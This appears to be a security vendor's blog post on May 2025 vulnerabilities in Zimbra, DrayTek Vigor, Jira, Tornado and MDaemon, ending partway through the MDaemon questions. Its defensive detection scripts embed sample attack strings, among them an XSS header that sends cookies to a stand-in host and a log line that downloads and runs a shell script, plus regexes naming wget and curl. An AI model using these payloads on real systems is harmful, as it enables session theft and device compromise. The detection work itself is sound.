UK’s Legal Aid Cyber Attack: Everything We Know So Far

The UK’s Legal Aid Agency (LAA), overseen by the Ministry of Justice, has fallen victim to a major cyber attack, widely regarded as one of the most significant breaches of sensitive data in the UK’s legal sector to date.

The attack, which came to light in April 2025, has exposed deeply confidential information. It has also disrupted critical services, triggering national concern and prompting urgent investigations.

Cracking the Coinbase Breach: What Went Wrong and What We Can Learn

Coinbase, one of the most influential cryptocurrency platforms in the world, is the latest victim of a headline-making cyber attack. There have been other crypto-related hacks with arguably larger repercussions than those seen with Coinbase so far, but there is a lot more at stake here.

UK Retailers Cyber Attack Saga; Is USA next for Scattered Spider?

UK retailers are bearing the full brunt of a wave of cyber crime. It started with Marks and Spencer on the Easter weekend: customers were left high and dry, unable to access their “Click and Collect” orders, online payments went down and store shelves emptied fast.

Marks and Spencer Confirms Personal Data Stolen in Cyber Attack

Easter weekend didn’t go as planned for Marks & Spencer - one of the UK's favourite retailers for clothes, food and more. The industry giant fell victim to a cyber attack that deeply disrupted its operations. Customers were unable to access the Click and Collect service and even contactless payments were inaccessible.

Cyber Threats to Financial Data: Why CPAs Must Stay Ahead

The finance sector is a prime target for cyber attacks because of the value of the digital financial assets it protects. Banks, investment companies and insurance firms are attractive to cybercriminals whose attack techniques keep evolving, and the pressure on these companies to apply strict cybersecurity policies grows daily.

The New Phishing Playbook That’s Exploiting Remote Teams at Scale

The surge in remote work didn't just rewrite the rules of collaboration; it unlocked doors that many organisations didn’t even know existed. Conversations that once occurred face-to-face now bounce through cloud platforms, scattered across Slack threads, Zoom calls, and internal wikis.

Workflows became more flexible, but the trust infrastructure behind them did not keep up. The illusion of a closed, protected system vanished, replaced by a vast, decentralized sprawl in which the line between internal and external communication blurs a little more every day. The increased likelihood of data breaches associated with remote working adds further urgency to addressing these vulnerabilities.

Focus Friday: TPRM Insights into Zimbra, Draytek Vigor, Atlassian Jira Data Center, Tornado, and MDaemon Vulnerabilities

23 May 2025 at 09:27

Written by: Ferdi Gül

This Week’s Emerging Third-Party Risks in Email Infrastructure and Web Frameworks

Welcome to this week’s edition of Focus Friday, where we provide timely insights into high-profile vulnerabilities from a Third-Party Risk Management (TPRM) lens. In today’s interconnected environment, vulnerabilities affecting one vendor’s technology stack can ripple across entire ecosystems—disrupting operations, compromising sensitive data, and escalating vendor risk exposure.

This week’s FocusTags™ spotlight several notable vulnerabilities with direct implications for organizations relying on third-party software for communication infrastructure and web application delivery. We begin with Zimbra’s CalendarInvite XSS vulnerability, already being exploited by APT28; then examine DrayTek Vigor gateway devices, which are being recruited into botnets due to a critical OS command injection flaw. We also review a newly disclosed privilege escalation vulnerability in Atlassian Jira Data Center, which allows low-privilege users to act with higher-privilege permissions, threatening issue tracking and service management workflows. In addition, we cover a Denial-of-Service vulnerability in Tornado Web Server that threatens application availability, and an actively exploited zero-day XSS vulnerability in MDaemon Email Server, used for credential theft and mailbox compromise.

Each of these incidents highlights the urgency of identifying and remediating vulnerabilities—not just internally, but across your third-party network. This blog helps TPRM professionals do exactly that.

Filtered view of companies with Zimbra – May2025 FocusTag™ on the Black Kite platform.

CVE-2024-27443 – Zimbra Webmail CalendarInvite XSS Vulnerability

What is CVE-2024-27443 in Zimbra?

CVE-2024-27443 is a medium-severity reflected Cross-Site Scripting (XSS) vulnerability affecting Zimbra Collaboration Suite (ZCS) versions 9.0.x (prior to Patch 39) and 10.0.x (prior to 10.0.7). The flaw resides in the Classic Webmail UI’s CalendarInvite feature, where the X-Zimbra-Calendar-Intended-For email header is improperly sanitized. This allows attackers to inject malicious JavaScript into calendar invitations.

When a user opens a crafted calendar invite in the Classic UI, the embedded script executes within their webmail session, potentially enabling attackers to:

  • Steal authentication cookies
  • Redirect or manipulate incoming emails
  • Insert unauthorized calendar events
  • Send emails or alter contact information as the user.

The vulnerability has a CVSS v3.1 score of 6.1 (Medium) and an EPSS score of 16.22%. It was patched on March 1, 2024, but was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog on May 19, 2025, indicating active exploitation in the wild. Notably, the Sednit group (also known as APT28) has been linked to exploiting this vulnerability as part of Operation RoundPress, targeting governmental and defense entities in Eastern Europe and beyond.

Why Should TPRM Professionals Be Concerned About CVE-2024-27443?

Zimbra is widely used for enterprise email and calendar services. A compromise of its webmail interface can lead to unauthorized access to sensitive communications and data. The exploitation of CVE-2024-27443 allows attackers to impersonate users, exfiltrate confidential information, and potentially pivot to other systems within the organization. Given the association with APT28, a state-sponsored threat actor, the risk extends to espionage and targeted attacks against critical sectors.

What Questions Should TPRM Professionals Ask Vendors Regarding CVE-2024-27443?

  1. Have you upgraded your Zimbra Collaboration to at least 9.0.0 P39 or 10.0.7 to mitigate the risk of CVE-2024-27443?
  2. Have you implemented the recommended hardening measures such as disabling or restricting HTML calendar rendering in the Classic UI and enforcing a Content Security Policy (CSP) to block inline scripts in email/calendar views?
  3. Have you reviewed your webmail access logs for suspicious calendar invite parameters and deployed IDS/IPS signatures to detect XSS payload patterns in calendar headers as recommended?
  4. Can you confirm if you have trained your users to view calendar invitations only from trusted senders and report unexpected invites as part of your mitigation strategy against CVE-2024-27443?

Remediation Recommendations for Vendors Affected by CVE-2024-27443

  • Apply Vendor Patches: Upgrade Zimbra Collaboration to at least version 9.0.0 Patch 39 or 10.0.7.
  • Harden Webmail Rendering: Disable or restrict HTML rendering in calendar invitations within the Classic UI until patching is complete.
  • Enforce Content Security Policies (CSP): Implement CSP to block inline scripts in email and calendar views.
  • User Training: Educate users to be cautious with calendar invites, especially from unknown senders, and to report suspicious activities.
  • Monitor and Detect: Review webmail access logs for unusual calendar invite parameters and deploy intrusion detection systems to identify XSS payload patterns.
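The “Monitor and Detect” item above is easier to act on with a concrete check. The following is an added example, not Zimbra’s own code: it pulls raw RFC 5322 messages (for instance from a mail-gateway quarantine or a mail-store export) and flags any whose X-Zimbra-Calendar-Intended-For header carries markup or script instead of a plain address, which is the trigger condition for CVE-2024-27443. The two sample messages, the sender addresses and the c2.example URL are constructed for the example.

```python
"""Flag messages whose X-Zimbra-Calendar-Intended-For header carries
markup or script instead of a plain address (CVE-2024-27443 trigger).
Added example, not Zimbra's own code."""
import email
import re
from email.message import Message
from typing import Dict, List

HEADER = "X-Zimbra-Calendar-Intended-For"

# A legitimate value is a bare mailbox address; anything carrying tags,
# event handlers, a javascript: URL or HTML entities is out of place there.
ADDRESS_RE = re.compile(r"^[^\s<>\"']+@[^\s<>\"']+$")
PAYLOAD_RE = re.compile(
    r"<\s*/?[a-z]"          # opening or closing tag
    r"|javascript\s*:"      # scheme-based script URL
    r"|\bon[a-z]+\s*="      # onerror=, onload=, ...
    r"|&#x?[0-9a-f]+;",     # entity-encoded characters
    re.IGNORECASE,
)


def is_calendar_invite(msg: Message) -> bool:
    """True when any MIME part is text/calendar, i.e. the message is an invite."""
    return any(p.get_content_type() == "text/calendar" for p in msg.walk())


def inspect_message(raw: bytes) -> Dict[str, object]:
    """Return a verdict for one raw message."""
    msg = email.message_from_bytes(raw)
    # get_all() catches duplicated headers, not just the first occurrence.
    values = [str(v).strip() for v in (msg.get_all(HEADER) or [])]
    suspicious = [
        v for v in values
        if not ADDRESS_RE.match(v) and PAYLOAD_RE.search(v)
    ]
    return {
        "from": str(msg.get("From", "")),
        "subject": str(msg.get("Subject", "")),
        "calendar_invite": is_calendar_invite(msg),
        "header_values": values,
        "suspicious_values": suspicious,
        "flagged": bool(suspicious),
    }


def scan(messages: List[bytes]) -> List[Dict[str, object]]:
    """Verdicts for every flagged message in a batch."""
    return [v for v in (inspect_message(m) for m in messages) if v["flagged"]]


# Constructed sample messages (not real traffic).
BENIGN_INVITE = b"""From: alice@example.org
To: bob@example.org
Subject: Weekly sync
X-Zimbra-Calendar-Intended-For: bob@example.org
Content-Type: text/calendar; method=REQUEST; charset=UTF-8

BEGIN:VCALENDAR
END:VCALENDAR
"""

MALICIOUS_INVITE = b"""From: attacker@example.net
To: bob@example.org
Subject: Urgent meeting
X-Zimbra-Calendar-Intended-For: <img src=x onerror="fetch('https://c2.example/'+document.cookie)">
Content-Type: text/calendar; method=REQUEST; charset=UTF-8

BEGIN:VCALENDAR
END:VCALENDAR
"""

if __name__ == "__main__":
    for verdict in scan([BENIGN_INVITE, MALICIOUS_INVITE]):
        print(verdict["from"], verdict["subject"], verdict["suspicious_values"])
```

The header is matched on its raw value, so an attacker cannot hide the payload behind the Classic UI’s rendering; the check is cheap enough to run on every inbound invite at the gateway. It is a detection aid, not a substitute for the patch.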

How Can TPRM Professionals Leverage Black Kite for CVE-2024-27443?

Black Kite has issued the “Zimbra – May2025” FocusTag, providing high-confidence intelligence on vendors potentially exposed to CVE-2024-27443. This tag includes detailed information such as affected assets, IP addresses, and subdomains associated with vulnerable Zimbra deployments. By utilizing this FocusTag, TPRM professionals can:

  • Quickly identify and prioritize vendors at risk
  • Access actionable intelligence to assess the extent of exposure
  • Streamline communication with vendors regarding remediation efforts
  • Reduce the burden of broad-based questionnaires by focusing on affected parties
Black Kite’s Zimbra – May2025 FocusTag™ details critical insights on the event for TPRM professionals.

CVE-2024-12987 – DrayTek Vigor OS Command Injection Vulnerability

What is CVE-2024-12987 in DrayTek Vigor Devices?

CVE-2024-12987 is a critical OS command injection vulnerability affecting DrayTek Vigor2960, Vigor300B, and Vigor3900 routers running firmware version 1.5.1.4 or earlier. The flaw resides in the Web Management Interface’s /cgi-bin/mainfunction.cgi/apmcfgupload endpoint, where improper sanitization of the session parameter allows remote attackers to inject and execute arbitrary shell commands.

An attacker can exploit this vulnerability by sending a specially crafted HTTP/1.0 request with a hex-encoded payload to the vulnerable endpoint, resulting in command execution with elevated privileges. A public proof-of-concept (PoC) script demonstrates this exploitation method.

The vulnerability has a CVSS v3.1 score of 9.8 (Critical) and an EPSS score of 56.05%. It was added to CISA’s Known Exploited Vulnerabilities catalog on May 16, 2025, indicating active exploitation in the wild. Notably, the Rust-based botnet “RustoBot” leverages this vulnerability to compromise DrayTek gateways, recruiting them into distributed denial-of-service (DDoS) campaigns across regions including Japan, Taiwan, Vietnam, and Mexico.

Why Should TPRM Professionals Be Concerned About CVE-2024-12987?

DrayTek Vigor devices are commonly used as network gateways in enterprise environments. A compromise of these devices can lead to unauthorized access to internal networks, data exfiltration, and service disruptions. The exploitation of CVE-2024-12987 allows attackers to execute arbitrary commands, potentially leading to full device compromise and lateral movement within the network. Given the active exploitation by botnets like RustoBot, the risk extends to participation in large-scale DDoS attacks, amplifying the potential impact on both the compromised organization and external targets.

What Questions Should TPRM Professionals Ask Vendors Regarding CVE-2024-12987?

  1. Have you updated all instances of DrayTek Vigor2960, Vigor300B, and Vigor3900 devices to firmware version 1.5.1.5 or later to mitigate the risk of CVE-2024-12987? If your devices were on version 1.0.5 or earlier, did you first upgrade to 1.0.7.1 before applying 1.5.1.5?
  2. Have you implemented a Web Application Firewall (WAF) or Access Control Lists (ACLs) to filter unexpected parameters and disable unused CGI endpoints, specifically the /cgi-bin/mainfunction.cgi/apmcfgupload endpoint, to prevent the OS command injection vulnerability?
  3. Have you deployed IDS/IPS signatures for CVE-2024-12987 and are you actively monitoring for inbound requests to /cgi-bin/mainfunction.cgi/apmcfgupload and anomalous User-Agent strings or unexpected HTTP/1.0 traffic patterns as part of your incident response strategy?
  4. Given that the RustoBot botnet is actively exploiting this vulnerability, have you reviewed your logs for signs of exploitation and prepared for rapid rollback or device restoration in case of a suspected compromise?

Remediation Recommendations for Vendors Affected by CVE-2024-12987

  • Upgrade Firmware: Immediately update affected DrayTek devices to firmware version 1.5.1.5. For devices on version 1.0.5 or earlier, first upgrade to 1.0.7.1 before applying the latest firmware.
  • Restrict Management Access: Limit access to the Web Management Interface to trusted administrative networks; block direct internet exposure.
  • Network Segmentation: Isolate device management VLANs and implement firewall rules to prevent lateral movement.
  • Monitor & Detect: Scan for inbound requests to /cgi-bin/mainfunction.cgi/apmcfgupload and anomalous User-Agent strings or unexpected HTTP/1.0 traffic patterns.
  • Harden Configuration: Employ a Web Application Firewall (WAF) or Access Control Lists (ACLs) to filter unexpected parameters and disable unused CGI endpoints.
  • Incident Response: Review logs for signs of exploitation, deploy intrusion detection/prevention systems (IDS/IPS) signatures for CVE-2024-12987, and plan for rapid rollback or device restoration if compromise is suspected.
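The monitoring items above name the endpoint and the traffic patterns to look for; the following added example (not DrayTek’s code) turns them into a log check. It assumes access logs in the common “combined” format, as written by a reverse proxy or syslog collector in front of the Web Management Interface (DrayTek’s own log format differs), parses requests to /cgi-bin/mainfunction.cgi/apmcfgupload, percent-decodes the session parameter and flags shell metacharacters or download-and-execute primitives in it. The three log lines are constructed.

```python
"""Pick out CVE-2024-12987 exploitation attempts in HTTP access logs
covering a DrayTek Vigor management interface. Added example, not
DrayTek code; log lines are constructed in 'combined' format."""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

ENDPOINT = "/cgi-bin/mainfunction.cgi/apmcfgupload"

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/\d\.\d)" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Shell metacharacters and download/execute primitives that have no
# business inside a session identifier.
SHELL_RE = re.compile(
    r"[;|&`]|\$\(|\n|\b(?:wget|curl|tftp|busybox|chmod|sh)\b",
    re.IGNORECASE,
)


def analyse_line(line: str) -> Optional[Dict[str, str]]:
    """Return a finding for one log line, or None if it is not of interest."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    url = urlsplit(m["target"])
    if url.path != ENDPOINT:
        return None
    params = parse_qs(url.query, keep_blank_values=True)
    # parse_qs already percent-decodes once; a second unquote() exposes
    # double-encoded payloads (assumption: attackers may encode twice).
    session = unquote(params.get("session", [""])[0])
    if SHELL_RE.search(session):
        verdict = "exploit_attempt"
    elif m["proto"] == "HTTP/1.0":
        verdict = "probe_http10"   # the public PoC speaks HTTP/1.0
    else:
        verdict = "endpoint_access"
    return {
        "src": m["src"], "time": m["ts"], "proto": m["proto"],
        "user_agent": m["ua"], "session": session, "verdict": verdict,
    }


def analyse_log(lines: List[str]) -> List[Dict[str, str]]:
    """Findings for every line that touches the vulnerable endpoint."""
    return [f for f in (analyse_line(line) for line in lines) if f]


# Constructed sample log (documentation-range addresses).
SAMPLE_LOG = [
    '198.51.100.20 - admin [16/May/2025:09:01:12 +0000] "GET /weblogin.htm HTTP/1.1" 200 2312 "-" "Mozilla/5.0"',
    '203.0.113.77 - - [16/May/2025:09:02:44 +0000] "POST /cgi-bin/mainfunction.cgi/apmcfgupload?session=%27%3Bwget%20http%3A%2F%2F203.0.113.9%2Fbot.sh%3Bsh%20bot.sh%3B%27 HTTP/1.0" 200 16 "-" "python-requests/2.31"',
    '203.0.113.78 - - [16/May/2025:09:03:01 +0000] "GET /cgi-bin/mainfunction.cgi/apmcfgupload?session=abc123 HTTP/1.0" 404 0 "-" "curl/8.5.0"',
]

if __name__ == "__main__":
    for finding in analyse_log(SAMPLE_LOG):
        print(finding["verdict"], finding["src"], finding["proto"], repr(finding["session"]))
```

A caveat when reading the results: only the query string is visible in an access log, so a payload carried in a POST body will show up as plain “endpoint_access” or “probe_http10”. Any request to this endpoint from outside the administrative network is worth a look regardless of verdict, since the interface should not be internet-facing at all.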

How Can TPRM Professionals Leverage Black Kite for CVE-2024-12987?

Black Kite has issued the “DrayTek Vigor – May2025” FocusTag, providing high-confidence intelligence on vendors potentially exposed to CVE-2024-12987. This tag includes detailed information such as affected assets, IP addresses, and subdomains associated with vulnerable DrayTek deployments. By utilizing this FocusTag, TPRM professionals can quickly identify and prioritize vendors at risk, assess the extent of their exposure, and focus remediation discussions on the affected parties rather than issuing broad-based questionnaires.

Black Kite’s DrayTek Vigor – May2025 FocusTag™ details critical insights on the event for TPRM professionals.

CVE-2025-22157 – Atlassian Jira Data Center Privilege Escalation

What is the Jira Data Center Privilege Escalation Vulnerability (CVE-2025-22157)?

CVE-2025-22157 is a high-severity privilege escalation vulnerability affecting Atlassian Jira Core and Jira Service Management Data Center and Server editions. This flaw allows authenticated users with low-level permissions to perform actions under higher-privileged accounts by exploiting improper permission checks in Jira’s REST API and backend handlers. The vulnerability was introduced in versions 9.12.0, 10.3.0, 10.4.0, and 10.5.0 of Jira Core, and versions 5.12.0, 10.3.0, 10.4.0, and 10.5.0 of Jira Service Management.

With a CVSS score of 7.2 and an EPSS score of 0.05%, this vulnerability poses a significant risk, allowing attackers to compromise administrative functions, alter project configurations, and disrupt service-desk operations. As of now, there is no public PoC exploit code, and the vulnerability has not been added to CISA’s Known Exploited Vulnerabilities catalog.

Why Should TPRM Professionals Be Concerned About CVE-2025-22157?

Jira Data Center is widely used for project management, issue tracking, and service management across various industries. A privilege escalation vulnerability in such a critical system can lead to unauthorized access to sensitive data, disruption of workflows, and potential compliance violations. Third-party vendors using vulnerable versions of Jira may inadvertently expose your organization to these risks.

What Questions Should TPRM Professionals Ask Vendors Regarding CVE-2025-22157?

  1. Can you confirm if you have upgraded all instances of Jira Core Data Center & Server and Jira Service Management Data Center & Server to the recommended versions (9.12-series → ≥ 9.12.20; 10.3-series → ≥ 10.3.5; 10.4-series → ≥ 10.6.0; 10.5-series → ≥ 10.5.1) to mitigate the risk of CVE-2025-22157?
  2. Have you implemented stricter privilege boundaries and temporary restrictions on low-privilege accounts until patches are applied as recommended in the advisory for CVE-2025-22157?
  3. Have you enabled logging and alerts for privilege-sensitive API endpoints and administrative actions to monitor potential exploitation of the privilege escalation vulnerability (CVE-2025-22157) in Jira Core and Service Management?
  4. Have you conducted an audit of existing project-level and read-only roles for unusual API activity as part of your response to the CVE-2025-22157 vulnerability?

Remediation Recommendations for Vendors Affected by CVE-2025-22157

  • Upgrade Jira Immediately: Apply the latest patches provided by Atlassian to address CVE-2025-22157.
  • Review Permissions: Conduct a thorough audit of user roles and permissions to ensure proper access controls are in place.
  • Harden Access Controls: Implement stricter privilege boundaries and consider temporary restrictions on low-privilege accounts until patches are applied.
  • Monitor & Alert: Enable logging and alerts for privilege-sensitive API endpoints and administrative actions to detect any suspicious activities.
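Because the fix version depends on which release series a vendor runs (and the 10.4 series has no fix build of its own), checking a vendor’s answer to question 1 by hand is error-prone. The following added example, not Atlassian code, encodes the series-to-fix mapping quoted in this post for Jira Core Data Center and Server and applies it to a constructed host inventory. Series the advisory does not name are reported as “series_not_listed” rather than as safe; the Jira Service Management 5.12 series is not covered because this post gives no target build for it.

```python
"""Assess Jira Core Data Center/Server builds against CVE-2025-22157 using
the series-to-fix mapping quoted in the post. Added example, not Atlassian
code; the inventory at the bottom is constructed."""
import re
from typing import Dict, List, Optional, Tuple

Version = Tuple[int, int, int]

# (major, minor) series -> first build that carries the fix.
FIX_FOR_SERIES: Dict[Tuple[int, int], Version] = {
    (9, 12): (9, 12, 20),
    (10, 3): (10, 3, 5),
    (10, 4): (10, 6, 0),   # no fixed 10.4.x build; the advisory points to 10.6.0
    (10, 5): (10, 5, 1),
}

VERSION_RE = re.compile(r"^\s*v?(\d+)\.(\d+)(?:\.(\d+))?")


def parse_version(text: str) -> Optional[Version]:
    """'10.4.2' -> (10, 4, 2); '9.12' -> (9, 12, 0); junk -> None."""
    m = VERSION_RE.match(text)
    if not m:
        return None
    return int(m[1]), int(m[2]), int(m[3] or 0)


def fmt(v: Version) -> str:
    return ".".join(str(n) for n in v)


def assess(version_text: str) -> Dict[str, object]:
    """Status of one build: vulnerable, fixed, series_not_listed or unparseable."""
    v = parse_version(version_text)
    if v is None:
        return {"version": version_text, "status": "unparseable", "target": None}
    target = FIX_FOR_SERIES.get(v[:2])
    if target is None:
        return {"version": fmt(v), "status": "series_not_listed", "target": None}
    # Tuple comparison handles the 10.4 -> 10.6.0 cross-series target correctly.
    status = "fixed" if v >= target else "vulnerable"
    return {"version": fmt(v), "status": status, "target": fmt(target)}


def triage(inventory: Dict[str, str]) -> List[Dict[str, object]]:
    """Assess every host in a {hostname: version} inventory, vulnerable first."""
    rows = [dict(host=host, **assess(ver)) for host, ver in inventory.items()]
    return sorted(rows, key=lambda r: r["status"] != "vulnerable")


# Constructed inventory, as a vendor might report it.
INVENTORY = {
    "jira-eu.example.net": "9.12.19",
    "jira-us.example.net": "10.4.2",
    "jira-lab.example.net": "10.5.1",
    "jira-old.example.net": "8.20.10",
}

if __name__ == "__main__":
    for row in triage(INVENTORY):
        print(row["host"], row["version"], row["status"], row["target"] or "")
```

Use it on the version strings the vendor actually returns (the build number from the Jira footer or the /rest/api/2/serverInfo response), not on what they say they are “on”; the difference between 10.4.2 and 10.6.0 is exactly the kind of detail that gets lost in a questionnaire.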

How Can TPRM Professionals Leverage Black Kite for CVE-2025-22157?

Black Kite published the FocusTag for CVE-2025-22157 on May 22, 2025. This tag enables TPRM professionals to identify third-party vendors that may be affected by this vulnerability. By providing asset information such as IP addresses and subdomains, Black Kite allows for a more precise assessment of potential risks within your supply chain. Utilizing this information, you can prioritize remediation efforts, engage in informed discussions with vendors, and enhance your organization’s overall cybersecurity posture.

Black Kite’s Atlassian Jira Data Center FocusTag™ details critical insights on the event for TPRM professionals.

CVE-2025-47287 – Tornado Web Server DoS Vulnerability

What is the Tornado multipart/form-data Denial-of-Service vulnerability (CVE-2025-47287)?

CVE-2025-47287 is a high-severity Denial-of-Service (DoS) vulnerability affecting Tornado, a Python-based asynchronous web framework and networking library. The vulnerability arises from the way Tornado’s built-in multipart/form-data parser handles malformed inputs. In affected versions (all releases prior to 6.5.0), if the parser encounters certain structural issues in multipart requests, it logs a warning message but continues attempting to parse the rest of the request.

Because Tornado’s logging system operates synchronously by default, an attacker can remotely send a malformed multipart request to any vulnerable endpoint. This causes the application to generate a large volume of log entries, rapidly consuming disk space, CPU, and I/O resources. The attack does not require authentication or complex exploitation, and the affected parser is enabled by default.

This vulnerability carries a CVSS score of 7.5 (High) and an EPSS score of 0.10%. It was publicly disclosed on May 15, 2025, through GitHub’s security advisory system. There is no evidence of exploitation in the wild, and the issue has not been added to CISA’s Known Exploited Vulnerabilities catalog. Likewise, CISA has not issued an advisory regarding this vulnerability at this time.

Why Should TPRM Professionals Be Concerned About CVE-2025-47287?

While the vulnerability does not provide direct access to sensitive data or remote code execution capabilities, it poses a significant threat to service availability, which can have downstream effects on any integrated or dependent systems. Organizations using Tornado in public-facing APIs or web applications may experience partial or complete outages if targeted with malformed multipart/form-data payloads.

From a third-party risk management (TPRM) perspective, vendors who use Tornado in production environments without proper traffic filtering or resource limits may unknowingly expose critical services to denial-of-service scenarios. If such services are part of an enterprise’s supply chain—such as SaaS products or integration providers—disruptions may cascade into the organization’s own operations, undermining continuity and performance expectations.

Remediation Recommendations for Vendors Affected by CVE-2025-47287

Vendors who maintain Tornado-based systems should take the following technical steps to mitigate risk:

  • Upgrade Framework: Update Tornado to version 6.5.0 or later, where the issue has been resolved.
  • Proxy Mitigation: As a temporary measure, configure reverse proxies or Web Application Firewalls (WAFs) to block or rate-limit requests with Content-Type: multipart/form-data.
  • Input Validation: Implement strict server-side validation of multipart payload structures before they are processed by Tornado’s parser.
  • Resource Limiting: Enforce OS- or container-level resource quotas (e.g., for CPU, memory, and disk I/O) to prevent single services from exhausting shared system resources.
  • Monitoring and Alerting: Set up logging and metric-based alerting to detect rapid increases in log volume or application latency.
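The “Input Validation” item above asks for a structural check of the multipart body before it reaches the framework parser, so that a malformed request is refused with a 400 instead of being logged and parsed on. The following is an added example, not Tornado project code: a strict pre-validator that requires a well-formed boundary parameter, a delimiter on its own line before every part, a header block terminated by a blank line, a named form-data Content-Disposition in each part and a closing delimiter, with size and part-count limits that are assumptions to be tuned. The sample bodies are constructed, including one with the unterminated header block that the Tornado parser warns about and continues past.

```python
"""Strict structural pre-check for multipart/form-data bodies, to run in
front of Tornado's own parser (or any framework's). Added example, not
Tornado project code; limits and sample bodies are assumptions."""
import re
from typing import List, Tuple

MAX_BODY_BYTES = 8 * 1024 * 1024   # assumption: tune to the application
MAX_PARTS = 32                     # assumption

# RFC 2046 boundary: 1-70 characters from the bchars set, optionally quoted.
CONTENT_TYPE_RE = re.compile(
    r"^multipart/form-data\s*;\s*boundary=\"?([0-9A-Za-z'()+_,\-./:=?]{1,70})\"?\s*$",
    re.IGNORECASE,
)
DISPOSITION_RE = re.compile(
    r'^content-disposition:\s*form-data\s*;.*\bname="[^"]+"', re.IGNORECASE
)


def validate_multipart(content_type: str, body: bytes) -> Tuple[bool, str]:
    """Return (ok, reason). Anything that is not a well-formed body made of
    properly delimited, named form-data parts is rejected outright."""
    m = CONTENT_TYPE_RE.match(content_type or "")
    if not m:
        return False, "not multipart/form-data or malformed boundary parameter"
    if len(body) > MAX_BODY_BYTES:
        return False, "body exceeds size limit"
    delimiter = b"--" + m.group(1).encode("ascii")
    closing = delimiter + b"--"
    if not body.startswith(delimiter):
        return False, "body does not begin with the boundary delimiter"
    end = body.rfind(closing)
    if end < 0:
        return False, "closing delimiter missing"
    if body[end + len(closing):].strip(b"\r\n"):
        return False, "data after closing delimiter"
    parts = body[:end].split(delimiter)[1:]   # element 0 is the empty prefix
    if not parts:
        return False, "no parts"
    if len(parts) > MAX_PARTS:
        return False, "too many parts"
    for i, part in enumerate(parts):
        # Each delimiter must sit on its own line, so a part is CRLF ... CRLF.
        if len(part) < 4 or not (part.startswith(b"\r\n") and part.endswith(b"\r\n")):
            return False, f"part {i}: delimiter not on its own line"
        inner = part[2:-2]
        sep = inner.find(b"\r\n\r\n")
        if sep < 0:
            return False, f"part {i}: header block not terminated by blank line"
        header_lines = inner[:sep].decode("latin-1").split("\r\n")
        if not any(DISPOSITION_RE.match(h) for h in header_lines):
            return False, f"part {i}: missing form-data Content-Disposition with a name"
    return True, "ok"


def build_body(boundary: bytes, parts: List[Tuple[bytes, bytes]], close: bool = True) -> bytes:
    """Assemble a multipart body; used only to construct the samples below."""
    out = b""
    for headers, content in parts:
        out += b"--" + boundary + b"\r\n" + headers + b"\r\n\r\n" + content + b"\r\n"
    if close:
        out += b"--" + boundary + b"--\r\n"
    return out


BOUNDARY = b"Boundary-7f3a"
CT = "multipart/form-data; boundary=Boundary-7f3a"

# Constructed sample bodies.
GOOD = build_body(BOUNDARY, [
    (b'Content-Disposition: form-data; name="user"', b"alice"),
    (b'Content-Disposition: form-data; name="upload"; filename="a.txt"\r\nContent-Type: text/plain', b"hello"),
])
# Header block never terminated: the structural defect the parser warns on.
NO_HEADER_END = (b"--" + BOUNDARY + b"\r\n"
                 + b'Content-Disposition: form-data; name="user"\r\nalice\r\n'
                 + b"--" + BOUNDARY + b"--\r\n")
# Closing delimiter absent.
UNTERMINATED = build_body(BOUNDARY, [(b'Content-Disposition: form-data; name="user"', b"alice")], close=False)
# Part without a named Content-Disposition.
NAMELESS = build_body(BOUNDARY, [(b"Content-Type: text/plain", b"alice")])

if __name__ == "__main__":
    for label, body in [("good", GOOD), ("no_header_end", NO_HEADER_END),
                        ("unterminated", UNTERMINATED), ("nameless", NAMELESS)]:
        print(label, validate_multipart(CT, body))
```

The check has to sit in front of the framework’s parser to help: at a reverse proxy, or in a handler declared with `@tornado.web.stream_request_body` so the body is seen before Tornado’s form parsing runs. It is deliberately stricter than the parser (no preamble, no epilogue, no unnamed parts) because a public upload endpoint has no reason to accept those.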

How Can TPRM Professionals Leverage Black Kite for CVE-2025-47287?

Black Kite published the Tornado Web Server FocusTag on May 20, 2025, in response to the disclosure of CVE-2025-47287. This tag enables TPRM professionals to identify vendors potentially running vulnerable versions of Tornado, especially those with public-facing services that may accept multipart/form-data inputs.

The FocusTag offers very high confidence in product identification and includes granular intelligence such as subdomain and IP address visibility, helping organizations zero in on real exposure rather than issuing broad-based surveys. Operationalizing this tag allows risk teams to prioritize follow-ups with only the vendors that are relevant to this incident, saving time and reducing unnecessary noise in communication workflows.

The tag is set to expire on August 31, 2025, unless new developments warrant an update. Black Kite’s ability to tie internet-facing telemetry to software versioning ensures that customers receive actionable third-party insights rather than generic alerts.

Black Kite’s Tornado Web Server FocusTag™ details critical insights on the event for TPRM professionals.

CVE-2024-11182 – MDaemon Email Server XSS Vulnerability

What is the MDaemon Webmail XSS Vulnerability (CVE-2024-11182)?

CVE-2024-11182 is a medium-severity cross-site scripting (XSS) vulnerability affecting MDaemon Email Server versions prior to 24.5.1. The flaw resides in the webmail interface’s HTML email rendering component, where improper sanitization allows attackers to inject malicious JavaScript code via specially crafted emails. This vulnerability enables remote attackers to execute arbitrary scripts in the context of the user’s browser session, potentially leading to credential theft and unauthorized access to sensitive information.

The vulnerability has a CVSS score of 6.1 and an EPSS score of 37.33%. It was actively exploited as a zero-day by the Russia-linked threat actor APT28 (also known as Fancy Bear or Sednit) in a campaign dubbed “Operation RoundPress,” targeting government and defense sector webmail servers. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2024-11182 to its Known Exploited Vulnerabilities (KEV) catalog on May 19, 2025, highlighting its active exploitation in the wild.

Why Should TPRM Professionals Be Concerned About CVE-2024-11182?

MDaemon Email Server is widely used by organizations for email communication. Exploitation of CVE-2024-11182 can lead to unauthorized access to email accounts, exposure of sensitive communications, and potential lateral movement within an organization’s network. For third-party risk management (TPRM) professionals, this vulnerability poses significant concerns:

  • Data Exfiltration: Attackers can harvest credentials, contact lists, and email contents, leading to potential data breaches.
  • Persistent Access: The use of malicious Sieve rules allows attackers to maintain access even after initial compromise.
  • Supply Chain Risks: Vendors using vulnerable MDaemon versions may become entry points for attackers into larger networks.

What Questions Should TPRM Professionals Ask Vendors Regarding CVE-2024-11182?

To assess the risk associated with this vulnerability, TPRM professionals should inquire:

  1. Have you updated all instances of MDaemon Webmail to version 24.5.1 or later to mitigate the risk of CVE-2024-11182?
